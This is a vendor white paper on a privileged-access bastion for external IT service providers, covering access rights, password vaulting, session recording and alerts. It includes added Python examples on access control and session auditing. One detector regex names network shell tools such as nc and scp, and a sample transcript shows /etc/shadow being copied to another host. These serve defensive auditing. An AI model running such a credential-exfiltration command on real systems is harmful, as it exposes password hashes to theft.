White Paper: Service Provider Management v6.5 EN
13 pages
English




Extract

 
Contents

I. The operational difficulties engendered through recourse to IT service providers
  a) Security risks
  b) Problem of compliance with regulatory requirements
  c) Implementation and maintenance costs
  d) The case of shared accounts
II. What are the existing solutions?
  a) Low granularity of user rights
  b) Multiplicity of solutions engendering complex administration
  c) Reporting unsuited to regulatory requirements
  d) Disclosure of passwords
  e) Insufficient traceability
III. Wallix AdminBastion (WAB) – the administration platform for external service providers
  a) Extremely high access rights granularity
  b) Multiple device compatibility
  c) Integrated reporting tool
  d) Nondisclosure of target account passwords
  e) Total traceability of the operations carried out
  f) Integration in the existing identity management system
  g) Reduced installation and administration costs
  h) Generation of alerts
IV. The advantages of such a solution
  a) Reduced installation and administration costs
  b) Risk mitigation
  c) Standards compliance
V. Conclusion
White Paper – IS: Keeping control over your external service providers – v1.0
Page 2  
 
I. The operational difficulties engendered through recourse to IT service providers

Companies today have to open up their IT systems to an ever-increasing number of external service providers, firstly in order to reduce the IT budget (calling in external service providers to leverage competencies that are not part of the IT department's core business), and secondly to ensure quicker deployment of new solutions and IS maintenance. These service providers may include, for example:

· business software vendors needing to work on their applications
· facilities managers handling the management of all or some of the infrastructures and/or applications
· outsourcers in charge of technical support (e.g., a computer services company specialized in Oracle support and tuning)
· specialized consultants in a specific application domain (e.g., a CRM or ERP expert)

Every form of external service provision has three main short-term drawbacks: loss of control, longer execution times due to access authorization processes, and loss of in-house skills. Over the long term, the difficulty resides in controlling the costs of outsourcing. When it comes to IT facilities management, there are additional risks in terms of security, regulatory compliance and access management.

a) Security risks

Service providers are indispensable to the smooth running of the IT system, but they are not company employees and therefore represent a potentially sizable threat to the company (data leakage, destruction of sensitive data, etc.). Furthermore, without sophisticated audit systems, it is very difficult to trace the root causes of, and responsibility for, any malfunction. Some recent studies have confirmed the risks inherent in the privileges enjoyed by IT administrators, whether these administrators are in-house employees or external service providers.
The following figures serve by way of illustration (1):

- 35% of IT administrators admitted using their administration rights to snoop around the network and access confidential or sensitive information
- 74% of IT administrators admitted being capable of getting around the current mechanisms for protecting confidential or sensitive information
- The sensitive information to which administrators have access includes, in order of importance:
  o Customer database
  o Human resources database
  o Merger/takeover plan
  o Marketing information
  o Redundancy plan

In the event of dismissal, IT administrators leaving the company would take with them the following information:

Type of information           2009   2008
Customer database              47%    35%
Email server admin account     47%    13%
M&A plans                      47%     7%
Copy of R&D plans              46%    13%
CEO's password                 46%    11%
Financial reports              46%    11%
Privileged password list       42%    31%

(1) Source: 2009 Trust, Security & Passwords Survey Research Brief, survey carried out by Cyber-Ark Software on 400 IT professionals
 
It should be noted that the current economic situation seriously increases the risk of information leakage. Recourse to external service providers for administering all or part of the IS equipment magnifies these risks on account of:

- the very rapid staff turnover among many service providers, which increases the risk of information leakage following the departure of one of their IT administrators
- the difficulty for the client of guaranteeing the probity of the service provider's personnel, the risk being magnified in the case of a service provider with teams situated in low-wage economies, considering the trade value of the accessible information

Lastly, the company's own IT personnel must also be able to log in remotely, whether on call or simply working from a remote location, and they face connection problems identical to those of external service providers.

b) Problem of compliance with regulatory requirements

Access to sensitive systems and applications is subject to very strict audit rules: accesses must be protected by passwords, which are in turn subject to very rigorous rules. Accounts must be created by authorized personnel and must be deleted as soon as the user changes role within the company.
 
Alongside this, companies must prove that these rules are respected. This is very costly in terms of process implementation. These processes are tied to the identity of the user and their role in the company. How, then, do you deal with a user who has no identity within the company and whose role is defined by a facilities management contract rather than by a function within the company? External service providers access highly sensitive privileged accounts, but integrating and monitoring their activity is very complex since they are not employees of the company, and therefore requires the implementation of specific roles and processes.

c) Implementation and maintenance costs

The implementation of a facilities management contract is a long process and requires the cooperation of several departments. It is necessary, for example, to provide access to the core of the IT system, which involves systems managers, network managers, security managers, and so on. Closing this access at the end of the facilities management contract is just as complicated to implement. What is more, this time nobody is waiting on it being done, so there is a heightened risk of accesses remaining open that should have been closed long ago. This is why IT managers must regularly run audits to check that accesses have indeed been closed once the external service providers have logged out for the final time.

d) The case of shared accounts

At the intersection of compliance, security and maintenance costs lies the problem of shared accounts. Shared accounts have very often become a necessity for many companies: creating individual accounts for maintenance operations is something of a headache, but the more operators use one shared account, the harder it becomes to maintain a password policy and to audit access.

Companies wishing to outsource their IT maintenance therefore face a difficult choice: either create privileged accounts dedicated to their service providers, or compromise the security and compliance of their systems.
 
II. What are the existing solutions?

Various solutions already exist with the objective of providing secure access for external service providers, such as IPsec or SSL VPNs, SSH or RDP jump servers, leased lines, in-house developments, etc. These solutions are generally installed in a DMZ and act as a relay between the external service provider and the target device.
 
However, these solutions have various disadvantages:

a) Low granularity of user rights

These solutions generally provide access control at the IP address level, without going down to the level of the target account. It is therefore not possible, for example, to authorize connection with one or more specific accounts only; one can merely authorize access to a device and hence to all of its accounts.

b) Multiplicity of solutions engendering complex administration

For each type of device there is in general a specific solution. For example, UNIX or Linux servers will be accessible over SSH via a jump server, Windows servers via a Windows Terminal Server (TSE), and on-call operators will log on via an SSL VPN. Each of these solutions is administered in its own way, with the corollary of high day-to-day administration costs, and therefore a high risk of granting access rights that are too permissive in order to avoid having to modify them later.
 
c) Reporting unsuited to regulatory requirements

These solutions provide external service providers with access to critical systems and must therefore ship reporting features enabling the compliance of these accesses to be checked against the various standards (SOX, Basel II, etc.). However, the great majority of these solutions do not include reporting tools that meet these requirements.

d) Disclosure of passwords

These solutions require the service provider to know the password of the account used on the target device. For generic system accounts (e.g., the "administrator" account on a Windows server or "root" on a UNIX/Linux server), this means that the account password has to be passed on to the service provider. This transmission may constitute a major security risk, since passwords for generic system accounts are very rarely changed.

e) Insufficient traceability

These solutions generally supply a connection log, but without recording precisely what was done during the connection. It is therefore not possible to know, for example, whether an external service provider has tried to jump to another server.

III. Wallix AdminBastion (WAB) – the administration platform for external service providers

Wallix AdminBastion (WAB) is a solution developed by Wallix specifically for private companies and public organizations wishing to put in place an administration platform for handling external service providers. It complements the SSL or IPsec VPN solutions already present in companies and can replace solutions such as RDP or SSH jump servers.
 
WAB offers the following characteristics:

a) Extremely high access rights granularity

WAB defines access rights not at device level but at target account level. Depending on their profile, an external service provider is therefore able to log in to a given set of target accounts. On the same Windows server, for example, service provider X may be authorized to use the "administrator" account while another service provider, Y, is only authorized to use an account with far fewer privileges. User rights management follows the RBAC (Role-Based Access Control) model.

In addition to access rights, WAB also enables "protocol" rights to be defined for SSH connections. For each service provider and each target account, it is therefore possible to authorize or block:

· access to the shell
· execution of remote commands
· uploading or downloading of files via SCP

For example, a service provider in charge of server supervision can be authorized only to send commands to these servers (e.g., reboot), without being able to open a shell or transfer files.

b) Multiple device compatibility

WAB does not require an agent to be installed on the target devices and, through native support for the RDP, SSH, TELNET, SFTP and RLOGIN protocols, manages and records connections to the main types of target device:

· Windows servers
· UNIX servers (AIX, Solaris, HP-UX, etc.)
· Linux servers
· network devices, etc.

In addition, WAB can record connections using other protocols, in particular business application protocols, via an intermediate RDP server (e.g., Windows Terminal Server) serving as a jump server, on which the client software for the applications to be recorded (e.g., Oracle, SAP, Notes, VMware, etc.) is installed.
 
c) Integrated reporting tool

Via the WAB administration interface it is possible to consult the connection log per user or per target account, and to know at any time "who is logged in to what". Furthermore, WAB can produce at any time a report of the access authorizations held by each user, along with the access rights defined on each target account. For example, WAB automatically supplies the list of users able to use a specific account on a device (e.g., those with access to the generic "root" account of a Linux server).

d) Nondisclosure of target account passwords

WAB has a centralized authentication module which stores the passwords of the target accounts. A service provider can therefore be allowed to log in to a privileged account without being sent the corresponding password. What is more, a service provider with access to several target accounts only needs to know a single password, that of their WAB account, which avoids the risk of password leakage present in other solutions. This functionality may, of course, be deactivated on an account-by-account basis; in that case, the service provider authenticates first on the WAB and then on the target device.

In the case of shared accounts, whether root or any other privileged account, WAB takes care of every aspect of security, since these accounts become accessible to external service providers without them having to know the account passwords, and the passwords can easily be changed regularly. Each service provider with access is identified by their unique WAB identity, and their session is both logged and recorded. Thanks to WAB, system administrators keep the flexibility of shared accounts without compromising audit or security rules.
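The following is an added illustration, not part of the original white paper and not Wallix code: a small Python model of the access control and reporting described in sections III a) and III c) above, together with the critical-account alert of section III h). Authorizations are granted per (role, target account) rather than per device, SSH "protocol" rights (shell, remote command, SCP) are attached to each grant, a report lists who may use a given account on a given device, and a successful login to an account flagged as critical produces an alert record. All hosts, roles, users and account names are constructed for the example.

```python
"""Toy model of target-account-level access control on a bastion.

Added example, not Wallix code: it models the concepts described in
sections III a), c) and h) of the white paper, i.e. authorizations
granted per (role, target account) rather than per device, SSH
"protocol" rights (shell / remote command / SCP), the report of who may
use a given account on a device, and an alert on login to a critical
account. Hosts, roles, users and account names are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Optional, Set, Tuple

# Rights a session may exercise: the three SSH protocol rights named in
# the text, plus a plain RDP desktop session for Windows targets.
SHELL, EXEC, SCP, RDP = "shell", "exec", "scp", "rdp"
SSH_ALL = frozenset({SHELL, EXEC, SCP})


@dataclass(frozen=True)
class TargetAccount:
    host: str     # the device
    account: str  # the account on that device, e.g. "root"


@dataclass(frozen=True)
class Authorization:
    role: str
    target: TargetAccount
    rights: FrozenSet[str]


@dataclass
class Policy:
    role_members: Dict[str, Set[str]] = field(default_factory=dict)  # role -> users
    authorizations: List[Authorization] = field(default_factory=list)
    critical: Set[TargetAccount] = field(default_factory=set)

    def roles_of(self, user: str) -> Set[str]:
        return {r for r, members in self.role_members.items() if user in members}

    def rights_for(self, user: str, target: TargetAccount) -> FrozenSet[str]:
        """Union of the rights a user holds on one target account (empty = no access)."""
        roles = self.roles_of(user)
        rights: Set[str] = set()
        for auth in self.authorizations:
            if auth.role in roles and auth.target == target:
                rights |= auth.rights
        return frozenset(rights)

    def authorize(self, user: str, target: TargetAccount, action: str) -> Tuple[bool, Optional[str]]:
        """Decide one connection request.

        Returns (allowed, alert). The decision is made at target-account level,
        so two users on the same host may get different answers; an allowed
        login to a critical account additionally yields an alert message, which
        a real deployment would e-mail and write to the bastion's log.
        """
        allowed = action in self.rights_for(user, target)
        alert = None
        if allowed and target in self.critical:
            alert = f"critical login: {user} -> {target.account}@{target.host} ({action})"
        return allowed, alert

    def who_can_use(self, target: TargetAccount) -> List[str]:
        """Reporting: every user able to use a given account on a device."""
        users = {u for members in self.role_members.values() for u in members}
        return sorted(u for u in users if self.rights_for(u, target))

    def targets_of(self, user: str) -> List[Tuple[str, str, str]]:
        """Reporting: the access authorizations held by one user."""
        seen = {a.target for a in self.authorizations if a.role in self.roles_of(user)}
        return sorted((t.host, t.account, ",".join(sorted(self.rights_for(user, t)))) for t in seen)


# Constructed policy: one DBA vendor (alice) and one supervision contractor (bob).
ROOT_DB = TargetAccount("db01.example.internal", "root")
ADMIN_WIN = TargetAccount("win01.example.internal", "administrator")
MONITOR_WIN = TargetAccount("win01.example.internal", "svc_monitor")

POLICY = Policy(
    role_members={"dba_vendor": {"alice"}, "win_admin": {"alice"}, "supervision": {"bob"}},
    authorizations=[
        Authorization("dba_vendor", ROOT_DB, SSH_ALL),                 # full SSH rights on root
        Authorization("supervision", ROOT_DB, frozenset({EXEC})),      # remote commands only, e.g. reboot
        Authorization("win_admin", ADMIN_WIN, frozenset({RDP})),       # provider X: "administrator" on win01
        Authorization("supervision", MONITOR_WIN, frozenset({RDP})),   # provider Y: low-privilege account, same host
    ],
    critical={ROOT_DB},
)

if __name__ == "__main__":
    for user, target, action in [("alice", ROOT_DB, SHELL), ("bob", ROOT_DB, SHELL),
                                 ("bob", ROOT_DB, EXEC), ("bob", ADMIN_WIN, RDP)]:
        print(user, f"{target.account}@{target.host}", action, POLICY.authorize(user, target, action))
    print("who can use root on db01:", POLICY.who_can_use(ROOT_DB))
    print("alice's authorizations:", POLICY.targets_of("alice"))
```

Run as a script, the block shows bob being refused a shell on root@db01 while his reboot-style remote command is allowed (and alerted, since root@db01 is marked critical), and the two reports an auditor would ask for: who may use a given account, and what a given provider may reach.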
 
 
e) Total traceability of the operations carried out

WAB records the contents of sessions, in Flash video format for RDP/TSE sessions (Windows servers) and in text or video format for SSH, TELNET and rlogin sessions (Linux and UNIX servers, network devices, etc.). These session recordings can then be replayed to establish exactly what a service provider did on a target device. In addition, the text recordings of SSH sessions make it easy to search by keyword. Note: session recordings may be stored on the WAB itself or exported to external storage.

f) Integration in the existing identity management system

WAB fits into the existing user management system. If the service providers are listed in an enterprise directory (e.g., LDAP, Active Directory), they can be authenticated against that directory. WAB also allows them to be authenticated locally (the service provider's password is then managed by the WAB). WAB further offers strong authentication through its support of RADIUS as an external authentication protocol, and therefore supports solutions such as RSA SecurID and SafeWord. Last but not least, WAB ships an API that enables a third-party application (IAM, helpdesk, etc.) to manage it.

g) Reduced installation and administration costs

WAB is marketed mainly as a hardware or virtual appliance, enabling the solution to be rolled out in a very short timeframe. Furthermore, implementing the solution requires no agent, either on the target devices or on user workstations. The initial configuration of the WAB and its daily administration take place via a web interface (HTTPS) that is easy and intuitive to use and available in English and French. The WAB can also be administered via a command-line interface (CLI).

What is more, WAB lets administrators continue using their usual server administration tools (SSH clients such as PuTTY or WinSCP, the RDP "Remote Desktop" client, etc.), eliminating the need to train service providers on new tools. Note: to log on to target devices via the WAB, service providers may use a PC (Windows, Mac, Linux, etc.) or a smartphone (iPhone, Android, BlackBerry, Windows Mobile, etc.).
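The following is an added illustration, not part of the original white paper and not Wallix code. Section III e) notes that text-format SSH session recordings can be searched by keyword, and section II e) gives "did the provider try to jump to another server?" as the question a bare connection log cannot answer. This Python example scans a text transcript for commands that open a connection to another host or move files off the device, and runs an auditor-style keyword search. The transcript format (a prompt character followed by the command as typed, with output lines in between), the host names and the command lines are all constructed for the example.

```python
"""Keyword and lateral-movement search over a recorded SSH session.

Added example, not Wallix code: scans a text session recording for
commands that reach another host or transfer files, and for keywords.
The transcript format, host names and command lines are constructed.
"""
import re
from typing import List, Tuple

# Constructed transcript: what a text recording of a provider's session might hold.
TRANSCRIPT = """\
$ hostname
app01
$ systemctl status httpd
active (running)
$ ssh admin@db01.example.internal
admin@db01.example.internal's password:
$ scp /etc/shadow backup@10.0.5.20:/tmp/
$ sudo -i
# cat /etc/sudoers
"""

# A typed command (after a "$" or "#" prompt) whose first word is a tool
# that reaches another host or transfers files.
LATERAL_CMD = re.compile(
    r"^[$#]\s*(?:sudo\s+)?(ssh|scp|sftp|telnet|rlogin|nc|ncat|rsync)\b(.*)$")
# Hosts on the command line: IPv4 literals or dotted names, with an
# optional user@ prefix stripped.
HOST_TOKEN = re.compile(
    r"(?:\b[\w.-]+@)?((?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")


def find_lateral_movement(transcript: str, local_host: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, tool, remote_hosts) for each command that left the local host."""
    findings = []
    for n, line in enumerate(transcript.splitlines(), 1):
        m = LATERAL_CMD.match(line)
        if not m:
            continue
        tool, rest = m.group(1), m.group(2)
        hosts = [h for h in HOST_TOKEN.findall(rest) if h != local_host]
        if hosts:  # ignore e.g. "ssh -V", which names no destination
            findings.append((n, tool, hosts))
    return findings


def search_keywords(transcript: str, keywords: List[str]) -> List[Tuple[int, str, str]]:
    """Case-insensitive keyword search over the recording, as an auditor would run it."""
    hits = []
    for n, line in enumerate(transcript.splitlines(), 1):
        for kw in keywords:
            if kw.lower() in line.lower():
                hits.append((n, kw, line))
    return hits


if __name__ == "__main__":
    for n, tool, hosts in find_lateral_movement(TRANSCRIPT, "app01"):
        print(f"line {n}: {tool} to {', '.join(hosts)}")
    for n, kw, line in search_keywords(TRANSCRIPT, ["shadow", "sudoers"]):
        print(f"line {n}: '{kw}' in {line!r}")
```

The point of the contrast with a connection log is that the log would only show one session from the provider to app01; it is the recording that reveals the onward SSH hop to db01 and the copy of /etc/shadow to a third machine. A production implementation would also need to handle interactive programs and terminal control sequences, which this plain-text example ignores.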
 
h) Generation of alerts

WAB ships an alert generation module that sends an alert to a designated person (e.g., the WAB administrator) when a login occurs on a target account judged to be critical. The alert is sent by e-mail and also recorded in the corresponding WAB log file, making it easy to process with a commercially available monitoring tool. On receiving the alert, the WAB administrator can, if the session appears illegitimate, "kill" it directly from the screen that displays the list of open sessions in real time.

IV. The advantages of such a solution

Deploying the Wallix AdminBastion solution for the administration of external IT service providers offers IT managers decisive advantages.

a) Reduced installation and administration costs

Compared with several juxtaposed market solutions, this type of solution offers a low TCO (Total Cost of Ownership). In a project of this kind, the elements taken into account when comparing solutions are as follows:

- Duration of the installation project: is the workload measured in man-days or man-months?
- Administration costs: how long does it take to integrate a new service provider along with the corresponding access rights, and how long does it take to extend the pool of equipment to be administered?
- User training: how long does it take to train an external service provider in the use of the solution? (An important consideration, particularly when covering holiday periods and organizing the inevitable replacements.)
b) Risk mitigation

Compared with having no such solution, or a solution that only partially answers the problems highlighted, deploying Wallix AdminBastion allows IT managers to considerably reduce the risks associated with recourse to external service providers:

- nondisclosure of passwords for target devices
- granularity of access rights
- comprehensive traceability of administration sessions (session recording)
- alerts in the event of access to critical servers